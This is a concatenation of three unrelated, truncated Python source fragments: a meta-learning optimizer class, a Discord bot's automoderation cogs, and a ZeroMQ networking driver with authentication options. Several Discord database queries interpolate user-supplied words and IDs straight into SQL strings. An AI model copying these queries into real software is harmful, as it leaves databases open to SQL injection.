start_time = time.time()
n, _ = x.shape
if model == 'expmix':
w_local = worker.compute_local(w)
else:
w_local = worker.local_steps(w, **kwargs)
loss_array.append(worker.fun_value_general(x, y, w_local))
loss_weights.append(n)
return np.average(a=loss_array, weights=loss_weights)
def compute_loss_on_external_dataset_mixture(self, w: np.ndarray, counter_to_id: list, prefix: str, postfix_X: str='_X', postfix_y: str='_y') -> np.float32:
return self.compute_loss_on_external_dataset(model='expmix', w=w, counter_to_id=counter_to_id, prefix=prefix, postfix_X=postfix_X, postfix_y=postfix_y)
def compute_loss_on_external_dataset_local(self, w: np.ndarray, counter_to_id: list, stepsize: float, k: int, prefix: str, postfix_X: str='_X', postfix_y: str='_y') -> np.float32:
return self.compute_loss_on_external_dataset(model='local', w=w, counter_to_id=counter_to_id, prefix=prefix, postfix_X=postfix_X, postfix_y=postfix_y, stepsize=stepsize, k=k)
@deprecated
def stochastic_grad(self, w: np.ndarray, task_batch='full', data_batch='full', chosen_workers=None):
"""Compute stochastic gradient for Explicit Mixture Algorithm."""
if chosen_workers is None:
if task_batch == 'full':
task_batch = len(self.workers)
generator = default_rng()
chosen_workers = generator.choice(len(self.workers), size=task_batch, replace=False)
stoch_grad_vec = np.array([self.workers[i].explicit_mixture_stochastic_grad(w, batch=data_batch)
for i in chosen_workers])
stoch_grad = np.mean(stoch_grad_vec, axis=0)
return stoch_grad
@deprecated
def modified_stochastic_grad(self, w: np.ndarray, task_batch='full', data_batch='full', chosen_workers=None):
"""Compute stochastic gradient for Modified Explicit Mixture Algorithm."""
if chosen_workers is None:
if task_batch == 'full':
task_batch = len(self.workers)
generator = default_rng()
chosen_workers = generator.choice(len(self.workers), size=task_batch, replace=False)
grad_vec = np.array([
self.workers[i].modified_explicit_mixture_stochastic_gradient(w, self.modexpmix_number_of_inner_steps, self.modexpmix_inner_loop_lr, data_batch)
for i in chosen_workers
])
grad = np.mean(grad_vec, axis=0)
return grad
@deprecated
def fomaml_grad(self, w: np.ndarray, task_batch='full', data_batch='full', chosen_workers=None):
"""Compute FOMAML gradient.
Arguments:
w -- point to compute the gradient at
batch -- number of data points used for estimating the gradient at each machine (default 'full')
"""
if chosen_workers is None:
if task_batch == 'full':
task_batch = len(self.workers)
generator = default_rng()
chosen_workers = generator.choice(len(self.workers), size=task_batch, replace=False)
grad_vec = np.array([
self.workers[i].fomaml_stochastic_grad(w, self.fomaml_number_of_inner_steps, self.fomaml_inner_loop_lr, data_batch)
for i in chosen_workers
])
# print("FOMAML's table of gradients: {}".format(grad_vec))
grad = np.mean(grad_vec, axis=0)
return grad
@deprecated
def reptile_update(self, w: np.ndarray, task_batch: [int, 'full']='full', data_batch: [int, 'full']='full', chosen_workers: [list, np.ndarray]=None, joint_dataset: bool=True) -> np.ndarray:
"""Compute Reptile update.
Arguments:
w -- point to compute the gradient at
task_batch -- number of computing edges involved in gradient estimation (default 'full')
data_batch -- number of data points used for estimating the gradient at each machine (default 'full')
chosen_workers -- array of workers involved in computation; if given task_batch parameter is ignored
joint_dataset -- boolean representing whether to concatenate train and validation dataset at each machine or not
"""
if chosen_workers is None:
if task_batch == 'full':
task_batch = len(self.workers)
generator = default_rng()
chosen_workers = generator.choice(len(self.workers), size=task_batch, replace=False)
update_vec = np.array([self.workers[i].reptile_stochastic_update(w, self.reptile_number_of_inner_steps, self.reptile_inner_loop_lr, data_batch, joint_dataset=joint_dataset)
for i in chosen_workers])
update = np.mean(update_vec, axis=0)
return update
@deprecated
def sgd_mixed(self, w: np.ndarray=None, epochs=None, task_batch=5, data_batch='full', n_iter=100, save_history=False):
print_every = 100
if w is None:
generator = default_rng()
w = generator.normal(size=self.d)
history = [w]
if epochs is None:
return NotImplementedError
else:
generator = default_rng()
epoch_size = int(self.n_workers / task_batch)
curr_it = None
for epoch in range(epochs):
print('Epoch # {}'.format(epoch))
seq = generator.choice(self.n_workers, self.n_workers)
for i in range(epoch_size):
print('{} / {} epoch progress'.format(i, epoch_size))
chosen_workers = seq[i * task_batch : (i + 1) * task_batch]
curr_grad = self.stochastic_grad(w, data_batch=data_batch, chosen_workers=chosen_workers)
if (curr_grad.shape != w.shape):
warnings.warn('Gradient {} and w {} shapes mismatch. Shapes will be equalled.'.format(curr_grad.shape, w.shape))
curr_grad = np.reshape(curr_grad, w.shape)
w -= self.sgd_mixed_outer_loop * curr_grad
if save_history:
history.append(w)
curr_it = epoch * epoch_size + i
# if curr_it % print_every == 0:
# print('Iteration {}'.format(curr_it))
if save_history:
return history
else:
return w
@deprecated
def sgd_mixed_modified(self, w: np.ndarray=None, epochs=None, task_batch=5, data_batch='full', n_iter=100):
print_every = 100
if w is None:
generator = default_rng()
w = generator.normal(size=self.d)
if epochs is None:
return NotImplementedError
else:
generator = default_rng()
for epoch in range(epochs):
seq = generator.choice(self.n_workers, self.n_workers)
epoch_size = int(self.n_workers / task_batch)
for i in range(epoch_size):
chosen_workers = seq[i * task_batch : (i + 1) * task_batch]
curr_grad = self.modified_stochastic_grad(w, data_batch=data_batch, chosen_workers=chosen_workers)
w -= self.modexpmix_outer_loop_lr * curr_grad
curr_it = epoch * epoch_size + i
# if curr_it % print_every == 0:
# print('Iteration {}'.format(curr_it))
return w
@deprecated
def fomaml(self, w: np.ndarray = None, epochs=None, task_batch=5, data_batch='full', n_iter=100, save_history=False):
"""Run FOMAML. See https://arxiv.org/pdf/1803.02999.pdf
Arguments:
w -- initial guess (default None)
batch -- number of data points used for estimating the gradient at each machine (default 'full')
n_iter -- number of iterations taken for FOMAML to run (default 100)
"""
print_every = 100
if w is None:
generator = default_rng()
w = generator.normal(size=self.d)
history = [w]
print("Running FOMAML.")
if epochs is None:
for it in range(n_iter):
print('Iteration {}'.format(it))
curr_grad = self.fomaml_grad(w, task_batch, data_batch)
w -= self.fomaml_outer_loop_lr * curr_grad
if save_history:
history.append(w)
# if it % print_every == 0:
# print('Iteration {}'.format(it))
# if it % 10 == 0:
# print("Iteration {}: current gradient: {}".format(it, curr_grad))
# print("Iteration {}: value of <<w>> {}".format(it, w))
else:
epoch_size = int(self.n_workers / task_batch)
curr_it = None
for epoch in range(epochs):
print('Epoch #{}'.format(epoch))
print('Epoch size is {}'.format(epoch_size))
generator = default_rng()
seq = generator.choice(self.n_workers, self.n_workers)
for i in range(epoch_size):
print('{} / {} epoch progress'.format(i, epoch_size))
chosen_workers = seq[i * task_batch : (i + 1) * task_batch]
curr_grad = self.fomaml_grad(w, data_batch=data_batch, chosen_workers=chosen_workers)
w -= self.fomaml_outer_loop_lr * curr_grad
if save_history:
history.append(w)
curr_it = epoch * epoch_size + i
# if curr_it % print_every == 0:
# print('Iteration {}'.format(curr_it))
if save_history:
return history
else:
return w
@deprecated
def reptile(self, w: np.ndarray = None, epochs=None, task_batch=5, data_batch='full', n_iter=100, joint_dataset=True, save_history=False):
"""Run Reptile."""
print_every = 100
if w is None:
generator = default_rng()
w = generator.normal(size=self.d)
print("Running Reptile.")
history = [w]
if epochs is None:
for it in range(n_iter):
curr_update = self.reptile_update(w, task_batch, data_batch)
w += self.reptile_outer_loop_lr * curr_update
if save_history:
history.append(w)
# if it % print_every == 0:
# print('Iteration {}, current_update = {}, current w = {}'.format(it, curr_update, w))
else:
for epoch in range(epochs):
generator = default_rng()
seq = generator.choice(self.n_workers, self.n_workers)
epoch_size = int(self.n_workers / task_batch)
curr_it = None
for i in range(epoch_size):
chosen_workers = seq[i * task_batch : (i + 1) * task_batch]
curr_update = self.reptile_update(w, data_batch=data_batch, chosen_workers=chosen_workers, joint_dataset=joint_dataset)
w += self.reptile_outer_loop_lr * curr_update
if save_history:
history.append(w)
curr_it = epoch * epoch_size + i
# if curr_it % print_every == 0:
# print('Iteration {}, current_update = {}, current w = {}'.format(curr_it, curr_update, w))
if save_history:
return history
else:
return w
def run_gd(self, n_iter=100, save_memory=False, exp_name='gd'):
"""Run Gradient Descent.
Arguments:
n_iter -- maximum number of iterations taken for DIANA to converge (default 100)
save_memory -- set to False to save the history of convergence
"""
lr = 1/self.smoothness
w = np.ones_like(self.workers[0].w_opt)
f_values = []
grad_norms = []
l2_distances = []
exp_name = 'gd' + exp_name
for it in range(n_iter):
grad = self.grad(w)
fun_value = self.fun_value(w)
if not save_memory:
f_values.append(fun_value)
grad_norms.append(np.sum(grad**2))
l2_distances.append(np.sum((w - self.w_opt_global)**2))
w -= lr * grad
print('{:5d}/{:5d} Iterations: fun_value {:f}'
.format(it + 1, n_iter, fun_value), end='\r')
print('')
if not save_memory:
f_values = np.array(f_values)
f_values -= self.fun_value(self.w_opt_global)
grad_norms = np.array(grad_norms)
save_run(exp_name, self.alpha, grad_norms, f_values, l2_distances, self.dataset_name, self.logreg)
return w
def find_min(self):
"""Return the minimum of the explicit mixture."""
print("Finding minimum of the global function with Gradient Descent...")
return self.run_gd(max(2 * self.max_it, self.max_it + 100), True)
def recompute_global_min(self, max_it):
print("Recomputing the minimum of the global function with Gradient Descent...")
self.w_opt_global = self.run_gd(max_it, True)
return
def sparsification(self, vec, k):
"""Return a random sparsification for the given vector.
Arguments:
vec -- the vector to be sparsified
k -- 'k' in random-k compression operator, the cardinality of the set of indices returned
"""
generator = default_rng()
d = vec.size
inds = generator.choice(a=np.arange(d), size=k, replace=False)
positions = np.zeros(d)
positions[inds] = float(d) / k
# omega = d/k - 1
return positions * | |
<reponame>FabiChan99/Hikari-Discord-Bot
import discord.ext.commands
from Utils.data import *
stupidword = "https://cdn.discordapp.com/attachments/836905275252408341/838075043271016468/StupidWord.png"
DISCORD_INVITE = r'discord(?:app\.com|\.gg)[\/invite\/]?(?:(?!.*[Ii10OolL]).[a-zA-Z0-9]{5,7}|[a-zA-Z0-9\-]{2,32})'
class ImageOnlyAutomod(commands.Cog):
def __init__(self, bot: commands.Bot):
self.bot = bot
@commands.group(invoke_without_command=True)
async def imageonly(self, ctx):
embed = discord.Embed(
description=f'**AutoModeration Image-Only Channel**\n\n> `{prefix_data(ctx.guild.id)}imageonly add` Adds a new Channel\n> `{prefix_data(ctx.guild.id)}imageonly remove` Removes a Channel\n> `{prefix_data(ctx.guild.id)}imageonly list` List all Channels\n> `{prefix_data(ctx.guild.id)}imageonly clear` Clears all configured Channels!',
color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="Automoderation | Image-Only",
icon_url="https://cdn.discordapp.com/attachments/836905275252408341/837266055709589504/StupidImage2.png")
await ctx.message.reply(embed=embed, mention_author=False)
@imageonly.command(aliases=["set"])
@commands.has_permissions(administrator=True)
async def add(self, ctx, channelid: discord.TextChannel = None):
try:
channelid = channelid.id
except AttributeError:
pass
try:
if not channelid:
embed = discord.Embed(description="You need to mention the Channel or its ID",
color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="No Channel given", icon_url=cross_icon())
await ctx.send(embed=embed)
return
except AttributeError:
return
self.bot.cursor.execute(
f"SELECT channelid FROM imageonly WHERE guildid = '{ctx.guild.id}' and channelid = '{channelid}'")
result = self.bot.cursor.fetchone()
if result is None:
sql = ("INSERT INTO imageonly(guildid, channelid) VALUES(%s,%s)")
val = (str(ctx.guild.id), channelid)
self.bot.cursor.execute(sql, val)
self.bot.connection.commit()
embed = discord.Embed(description=f"Channel <#{channelid}> added to the Image-Only Automoderation")
embed.set_author(name="Automoderation | Image-Only", icon_url=chop_icon())
await ctx.message.reply(embed=embed, mention_author=False)
else:
embed = discord.Embed(description=f"Channel <#{channelid}> is already added!",
color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="Automoderation | Image-Only", icon_url=cross_icon())
await ctx.message.reply(embed=embed, mention_author=False)
@imageonly.command(aliases=["unset"])
@commands.has_permissions(administrator=True)
async def remove(self, ctx, channelid: discord.TextChannel = None):
try:
channelid = channelid.id
except AttributeError:
pass
try:
if not channelid:
embed = discord.Embed(description="You need to mention the Channel or its ID",
color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="No Channel given", icon_url=cross_icon())
await ctx.send(embed=embed)
return
except AttributeError:
return
self.bot.cursor.execute(
f"SELECT channelid FROM imageonly WHERE guildid = '{ctx.guild.id}' and channelid = '{channelid}'")
result = self.bot.cursor.fetchone()
if result is not None:
self.bot.cursor.execute(
"DELETE FROM imageonly WHERE guildid = '{}' and channelid = '{}'".format(ctx.guild.id, channelid))
self.bot.connection.commit()
embed = discord.Embed(description=f"Channel <#{channelid}> removed", color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="Automoderation | Image-Only", icon_url=chop_icon())
await ctx.message.reply(embed=embed, mention_author=False)
else:
embed = discord.Embed(description=f"Channel <#{channelid}> not set as Image-Only!",
color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="Automoderation | Image-Only", icon_url=cross_icon())
await ctx.message.reply(embed=embed, mention_author=False)
@imageonly.command(name='list')
@commands.has_permissions(administrator=True)
async def _list(self, ctx):
self.bot.cursor.execute(f"SELECT channelid FROM imageonly WHERE guildid = '{ctx.guild.id}'")
result = self.bot.cursor.fetchall()
res = list()
for i in result:
res.append(str(i[0]))
if res == []:
embed = discord.Embed(description="No Entrys", color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="Automoderation | Image-Only", icon_url=cross_icon())
await ctx.send(embed=embed)
else:
embed = discord.Embed(description=", ".join(res), color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="Automoderation | Image-Only", icon_url=cross_icon())
await ctx.send(embed=embed)
@imageonly.command()
@commands.has_permissions(administrator=True)
async def clear(self, ctx):
self.bot.cursor.execute(f"DELETE FROM imageonly WHERE guildid = '{ctx.guild.id}'")
self.bot.connection.commit()
embed = discord.Embed(description=f"Removed all Channels from Database.", color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="Automoderation | Image-Only", icon_url=chop_icon())
await ctx.message.reply(embed=embed, mention_author=False)
@commands.Cog.listener()
async def on_message(self, message):
try:
if message.guild:
self.bot.cursor.execute(
f"SELECT channelid FROM imageonly WHERE channelid = {message.channel.id} AND guildid = {message.guild.id}")
result = self.bot.cursor.fetchone()[0]
if message.channel.id == result:
if result is not None:
if message.attachments == []:
await message.delete()
try:
embed = discord.Embed(
description=f"Hey, `{message.author.name}`, the `{message.channel.name}` channel on `{message.guild.name}` is only for images. Please avoid sending text messages and instead send images only.",
color=color_data())
embed.set_author(name=f"Image Only Channel!",
icon_url="https://cdn.discordapp.com/attachments/771085429381922856/835885280367476796/2915_denied.png")
await message.author.send(embed=embed)
except AttributeError:
pass
except discord.errors.NotFound:
pass
except TypeError:
pass
class BadWordAutomod(commands.Cog):
def __init__(self, bot: commands.Bot):
self.bot = bot
@commands.group(invoke_without_command=True)
async def badword(self, ctx):
embed = discord.Embed(
description=f'**AutoModeration Badword List**\n\n> `{prefix_data(ctx.guild.id)}badword add` Adds a new Word\n> `{prefix_data(ctx.guild.id)}badword remove` Removes a Word\n> `{prefix_data(ctx.guild.id)}badword list` List all Badwords\n> `{prefix_data(ctx.guild.id)}badword clear` Clears all configured Badwords!',
color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="Automoderation | Badword",
icon_url=stupidword)
embed.set_footer(
text="Administrators are immune upon deletion! Added badwords only work if set lowercase! Dont worry it will Moderated if not lowercase in chat!")
await ctx.message.reply(embed=embed, mention_author=False)
@badword.command()
@commands.has_permissions(administrator=True)
async def add(self, ctx, badword):
try:
if not badword:
embed = discord.Embed(description="You Need to say the badword that should be added in to the database",
color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="No Word given", icon_url=cross_icon())
await ctx.send(embed=embed)
return
except AttributeError:
return
self.bot.cursor.execute(
f"SELECT word FROM badword WHERE guildid = '{ctx.guild.id}' AND word = '{badword}'")
result = self.bot.cursor.fetchone()
if result is None:
sql = ("INSERT INTO badword(guildid, word) VALUES(%s,%s)")
val = (str(ctx.guild.id), badword)
self.bot.cursor.execute(sql, val)
self.bot.connection.commit()
embed = discord.Embed(description=f"Word: `{badword}` added to the Automoderation Database",
color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="Automoderation | Badword", icon_url=chop_icon())
await ctx.message.reply(embed=embed, mention_author=False)
else:
embed = discord.Embed(description=f"Word: `{badword}` is already added!",
color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="Automoderation | Badword", icon_url=cross_icon())
await ctx.message.reply(embed=embed, mention_author=False)
@badword.command()
@commands.has_permissions(administrator=True)
async def remove(self, ctx, badword):
try:
if not badword:
embed = discord.Embed(description="You Need to say the badword that should be added in to the database",
color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="No Word given", icon_url=cross_icon())
await ctx.send(embed=embed)
return
except AttributeError:
return
self.bot.cursor.execute(
f"SELECT word FROM badword WHERE guildid = '{ctx.guild.id}' AND word = '{badword}'")
result = self.bot.cursor.fetchone()
if result is not None:
self.bot.cursor.execute(
"DELETE FROM badword WHERE guildid = '{}' and word = '{}'".format(ctx.guild.id, badword))
self.bot.connection.commit()
embed = discord.Embed(description=f"Word: `{badword}` removed", color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="Automoderation | Badword", icon_url=chop_icon())
await ctx.message.reply(embed=embed, mention_author=False)
else:
embed = discord.Embed(description="Word: `{}` not set as Badword!".format(badword),
color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="Automoderation | Badword", icon_url=cross_icon())
await ctx.message.reply(embed=embed, mention_author=False)
@badword.command(name='list')
@commands.has_permissions(administrator=True)
async def _list(self, ctx):
self.bot.cursor.execute(f"SELECT word FROM badword WHERE guildid = '{ctx.guild.id}'")
result = self.bot.cursor.fetchall()
res = list()
for i in result:
res.append(str(i[0]))
if res == []:
embed = discord.Embed(description="No Entrys", color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="Automoderation | Badword", icon_url=cross_icon())
await ctx.send(embed=embed)
else:
embed = discord.Embed(description=", ".join(res), color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="Automoderation | Badword", icon_url=cross_icon())
await ctx.send(embed=embed)
@badword.command()
@commands.has_permissions(administrator=True)
async def clear(self, ctx):
self.bot.cursor.execute(f"DELETE FROM badword WHERE guildid = '{ctx.guild.id}'")
self.bot.connection.commit()
embed = discord.Embed(description=f"Removed all Badwords from Database.", color=guild_embedcolor_ctx(self, ctx))
embed.set_author(name="Automoderation | Badword", icon_url=chop_icon())
await ctx.message.reply(embed=embed, mention_author=False)
@commands.Cog.listener()
async def on_message(self, message):
try:
if message.guild:
self.bot.cursor.execute(
f"SELECT word FROM badword WHERE guildid = '{message.guild.id}'")
result = self.bot.cursor.fetchall()
result2 = [i[0] for i in result]
if any(word in message.content.lower() for word in result2):
if message.author.guild_permissions.administrator: return
if not discord.utils.get(message.author.roles, id=771734897475059753) in message.author.roles:
await message.delete()
try:
embed = discord.Embed(
description=f"Hey, `{message.author.name}`, please try to avoid sending blacklisted words on `{message.guild.name}`",
color=guild_embedcolor_message(self, message))
embed.set_author(name="Bad Word!", icon_url=stupidword)
await message.author.send(embed=embed)
except AttributeError:
pass
except TypeError:
pass
class GenAutomod(commands.Cog):
def __init__(self, bot: commands.Bot):
self.bot = bot
@commands.Cog.listener()
async def on_message(self, message):
try:
timestampinv = datetime.datetime.now().strftime("%d.%m.%Y %H:%M:%S")
try:
self.bot.cursor.execute(
f"SELECT gid FROM antiinvite WHERE gid = '{message.guild.id}'")
setting = self.bot.cursor.fetchone()
if setting is not None:
regex = re.compile(DISCORD_INVITE)
invites = regex.findall(message.content)
if invites:
if message.author.guild_permissions.administrator: return
if message.author.bot: return
invite = invites[0]
invitedb = invites[0]
invite = await self.bot.fetch_invite(invite)
if invite.guild.id == message.guild.id: return
try:
self.bot.cursor.execute(f"DELETE FROM invitedb WHERE guildid = '{message.guild.id}'")
self.bot.connection.commit()
except:
pass
sql = ("INSERT INTO invitedb(guildid, inviteurl, invts, uname) VALUES(%s,%s,%s,%s)")
val = (str(message.guild.id), invitedb, timestampinv, str(message.author))
self.bot.cursor.execute(sql, val)
self.bot.connection.commit()
await message.delete()
embed = discord.Embed(
description="Hey {}, don't send invites! Server Invites are not allowed here!".format(
message.author.mention), color=guild_embedcolor_message(self, message))
embed.set_author(name=f"Auto-Mod | Anti-Invite | Invite Posted!",
icon_url="https://cdn.discordapp.com/attachments/836905275252408341/837285292377243679/Error-512.png")
await message.channel.send(embed=embed)
try:
embed = discord.Embed(
description=f"Hey, `{message.author.name}`, don't send invites on `{message.guild.name}`! Thats forbidden!",
color=color_data())
embed.set_author(name=f"Auto-Mod | Anti-Invite | Invite Posted!",
icon_url="https://cdn.discordapp.com/attachments/836905275252408341/837285292377243679/Error-512.png")
await message.author.send(embed=embed)
except AttributeError:
pass
except AttributeError:
pass
except:
self.bot.connection.rollback()
@commands.has_permissions(administrator=True)
@commands.command()
async def lastinvite(self, ctx, gid: discord.Guild = None):
if not gid:
gid = ctx.guild
try:
g = self.bot.get_guild(gid.id)
self.bot.cursor.execute(f"SELECT inviteurl FROM invitedb WHERE guildid = '{gid.id}'")
result = self.bot.cursor.fetchone()[0]
self.bot.cursor.execute(f"SELECT invts FROM invitedb WHERE guildid = '{gid.id}'")
resultts = self.bot.cursor.fetchone()[0]
self.bot.cursor.execute(f"SELECT uname FROM invitedb WHERE guildid = '{gid.id}'")
rname = self.bot.cursor.fetchone()[0]
await ctx.send(result)
await ctx.send("Last Invite from {}, it was sent {}, the User was {}".format(g.name, resultts, rname))
except:
g = self.bot.get_guild(gid.id)
embed = discord.Embed(description="No Invite was posted in {}!".format(g.name),
color=guild_embedcolor_ctx(self, ctx))
await ctx.message.reply(embed=embed, mention_author=False)
return
@commands.has_permissions(administrator=True)
@commands.command()
async def clearlastinvite(self, ctx):
try:
self.bot.cursor.execute(f"DELETE FROM invitedb WHERE guildid = '{ctx.guild.id}'")
self.bot.connection.commit()
except:
pass
embed = discord.Embed(description="Invite Cache was cleared!", color=guild_embedcolor_ctx(self, ctx))
await ctx.message.reply(embed=embed, mention_author=False)
@commands.has_permissions(manage_guild=True)
@commands.command()
async def antiinvite(self, ctx, state=None):
if state:
if state == "on" or state == "enable":
self.bot.cursor.execute(
f"SELECT gid FROM antiinvite WHERE gid = '{ctx.guild.id}'")
setting = self.bot.cursor.fetchone()
if setting is None:
sql = ("INSERT INTO antiinvite(gid, index) VALUES(%s,%s)")
val = (str(ctx.guild.id), "1")
self.bot.cursor.execute(sql, val)
self.bot.connection.commit()
embed = discord.Embed(description=f"Anti-Invite is now `Enabled`",
color=guild_embedcolor_ctx(self, ctx))
await ctx.message.reply(embed=embed, mention_author=False)
return
if setting is not None:
embed = discord.Embed(
description=f"Anti-Invite was already `Enabled`, to disable it type {prefix_data(ctx.guild.id)}disable",
color=guild_embedcolor_ctx(self, ctx))
await ctx.message.reply(embed=embed, mention_author=False)
return
if state == "off" or state == "disable":
self.bot.cursor.execute(
f"SELECT gid FROM antiinvite WHERE gid = '{ctx.guild.id}'")
setting = self.bot.cursor.fetchone()
if setting is not None:
self.bot.cursor.execute(f"DELETE FROM antiinvite WHERE gid = '{ctx.guild.id}'")
self.bot.connection.commit()
embed = discord.Embed(description=f"Anti-Invite is now `Disabled`",
| |
# Copyright Peznauts <<EMAIL>>. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import logging
import os
import time
import tenacity
try:
import zmq
import zmq.auth as zmq_auth
from zmq.auth.thread import ThreadAuthenticator
except (ImportError, ModuleNotFoundError):
pass
from directord import drivers
from directord import logger
from directord import utils
def parse_args(parser, parser_server, parser_client):
"""Add arguments for this driver to the parser.
:param parser: Parser
:type parser: Object
:param parser_server: SubParser object
:type parser_server: Object
:param parser_client: SubParser object
:type parser_client: Object
:returns: Object
"""
group = parser.add_argument_group("ZMQ driver options")
group.add_argument(
"--zmq-highwater-mark",
type=int,
default=os.getenv("DIRECTORD_ZMQ_HIGHWATER_MARK", 1024),
metavar="INTEGER",
help=("Set the ZMQ highwater mark. Default %(default)s."),
)
server_group = parser_server.add_argument_group(
"ZMQ Server driver options"
)
server_group.add_argument(
"--zmq-bind-address",
help=(
"ZMQ IP Address to bind a Directord Server."
" Default: %(default)s"
),
metavar="STRING",
default=os.getenv("DIRECTORD_ZMQ_BIND_ADDRESS", "*"),
)
client_group = parser_client.add_argument_group(
"ZMQ Client driver options"
)
client_group.add_argument(
"--zmq-server-address",
help=(
"ZMQ Domain or IP address of the Directord server."
" Default: %(default)s"
),
metavar="STRING",
default=os.getenv("DIRECTORD_ZMQ_SERVER_ADDRESS", "127.0.0.1"),
)
auth_group = group.add_mutually_exclusive_group()
auth_group.add_argument(
"--zmq-shared-key",
help="Shared key used for server client authentication.",
metavar="STRING",
default=os.getenv("DIRECTORD_ZMQ_SHARED_KEY", None),
)
auth_group.add_argument(
"--zmq-curve-encryption",
action="store_true",
help=(
"Server and client will connect using Curve authentication"
" and encryption. Enabling this option assumes keys have been"
" generated. see `manage --generate-keys` for more."
),
)
return parser
class Driver(drivers.BaseDriver):
def __init__(
self,
args,
encrypted_traffic_data=None,
interface=None,
):
"""Initialize the Driver.
:param args: Arguments parsed by argparse.
:type args: Object
:param encrypted_traffic: Enable|Disable encrypted traffic.
:type encrypted_traffic: Boolean
:param interface: The interface instance (client/server)
:type interface: Object
"""
self.args = args
self.encrypted_traffic_data = encrypted_traffic_data
mode = getattr(self.args, "mode", None)
if mode == "client":
self.bind_address = self.args.zmq_server_address
elif mode == "server":
self.bind_address = self.args.zmq_bind_address
else:
self.bind_address = "*"
self.proto = "tcp"
self.connection_string = "{proto}://{addr}".format(
proto=self.proto, addr=self.bind_address
)
if self.encrypted_traffic_data:
self.encrypted_traffic = self.encrypted_traffic_data.get("enabled")
self.secret_keys_dir = self.encrypted_traffic_data.get(
"secret_keys_dir"
)
self.public_keys_dir = self.encrypted_traffic_data.get(
"public_keys_dir"
)
else:
self.encrypted_traffic = False
self.secret_keys_dir = None
self.public_keys_dir = None
self.ctx = zmq.Context().instance()
self.poller = zmq.Poller()
self.interface = interface
super(Driver, self).__init__(
args=args,
encrypted_traffic_data=self.encrypted_traffic_data,
interface=interface,
)
self.bind_job = None
self.bind_backend = None
self.hwm = getattr(self.args, "zmq_highwater_mark", 1024)
def __copy__(self):
"""Return a new copy of the driver."""
return Driver(
args=self.args,
encrypted_traffic_data=self.encrypted_traffic_data,
interface=self.interface,
)
def _backend_bind(self):
"""Bind an address to a backend socket and return the socket.
:returns: Object
"""
bind = self._socket_bind(
socket_type=zmq.ROUTER,
connection=self.connection_string,
port=self.args.backend_port,
)
bind.set_hwm(self.hwm)
self.log.debug(
"Identity [ %s ] backend connect hwm state [ %s ]",
self.identity,
bind.get_hwm(),
)
return bind
def _backend_connect(self):
"""Connect to a backend socket and return the socket.
:returns: Object
"""
self.log.debug("Establishing backend connection.")
bind = self._socket_connect(
socket_type=zmq.DEALER,
connection=self.connection_string,
port=self.args.backend_port,
)
bind.set_hwm(self.hwm)
self.log.debug(
"Identity [ %s ] backend connect hwm state [ %s ]",
self.identity,
bind.get_hwm(),
)
return bind
def _bind_check(self, bind, interval=1, constant=1000):
"""Return True if a bind type contains work ready.
:param bind: A given Socket bind to identify.
:type bind: Object
:param interval: Exponential Interval used to determine the polling
duration for a given socket.
:type interval: Integer
:param constant: Constant time used to poll for new jobs.
:type constant: Integer
:returns: Object
"""
socks = dict(self.poller.poll(interval * constant))
if socks.get(bind) == zmq.POLLIN:
return True
else:
return False
def _close(self, socket):
try:
socket.close(linger=2)
close_time = time.time()
while not socket.closed:
if time.time() - close_time > 60:
raise TimeoutError(
"Job [ {} ] failed to close transfer socket".format(
self.job_id
)
)
else:
socket.close(linger=2)
time.sleep(1)
except Exception as e:
self.log.error(
"Backend ran into an exception while closing the socket %s",
str(e),
)
else:
self.log.debug("Backend socket closed")
def _job_bind(self):
"""Bind an address to a job socket and return the socket.
:returns: Object
"""
return self._socket_bind(
socket_type=zmq.ROUTER,
connection=self.connection_string,
port=self.args.job_port,
)
def _job_connect(self):
"""Connect to a job socket and return the socket.
:returns: Object
"""
self.log.debug("Establishing Job connection.")
return self._socket_connect(
socket_type=zmq.DEALER,
connection=self.connection_string,
port=self.args.job_port,
)
def _socket_bind(self, socket_type, connection, port, poller_type=None):
"""Return a socket object which has been bound to a given address.
When the socket_type is not PUB or PUSH, the bound socket will also be
registered with self.poller as defined within the Interface
class.
:param socket_type: Set the Socket type, typically defined using a ZMQ
constant.
:type socket_type: Integer
:param connection: Set the Address information used for the bound
socket.
:type connection: String
:param port: Define the port which the socket will be bound to.
:type port: Integer
:param poller_type: Set the Socket type, typically defined using a ZMQ
constant.
:type poller_type: Integer
:returns: Object
"""
if poller_type is None:
poller_type = zmq.POLLIN
bind = self._socket_context(socket_type=socket_type)
auth_enabled = (
self.args.zmq_shared_key or self.args.zmq_curve_encryption
)
if auth_enabled:
self.auth = ThreadAuthenticator(self.ctx, log=self.log)
self.auth.start()
self.auth.allow()
if self.args.zmq_shared_key:
# Enables basic auth
self.auth.configure_plain(
domain="*", passwords={"admin": self.args.zmq_shared_key}
)
bind.plain_server = True # Enable shared key authentication
self.log.info("Shared key authentication enabled.")
elif self.args.zmq_curve_encryption:
server_secret_file = os.path.join(
self.secret_keys_dir, "server.key_secret"
)
for item in [
self.public_keys_dir,
self.secret_keys_dir,
server_secret_file,
]:
if not os.path.exists(item):
raise SystemExit(
"The required path [ {} ] does not exist. Have"
" you generated your keys?".format(item)
)
self.auth.configure_curve(
domain="*", location=self.public_keys_dir
)
try:
server_public, server_secret = zmq_auth.load_certificate(
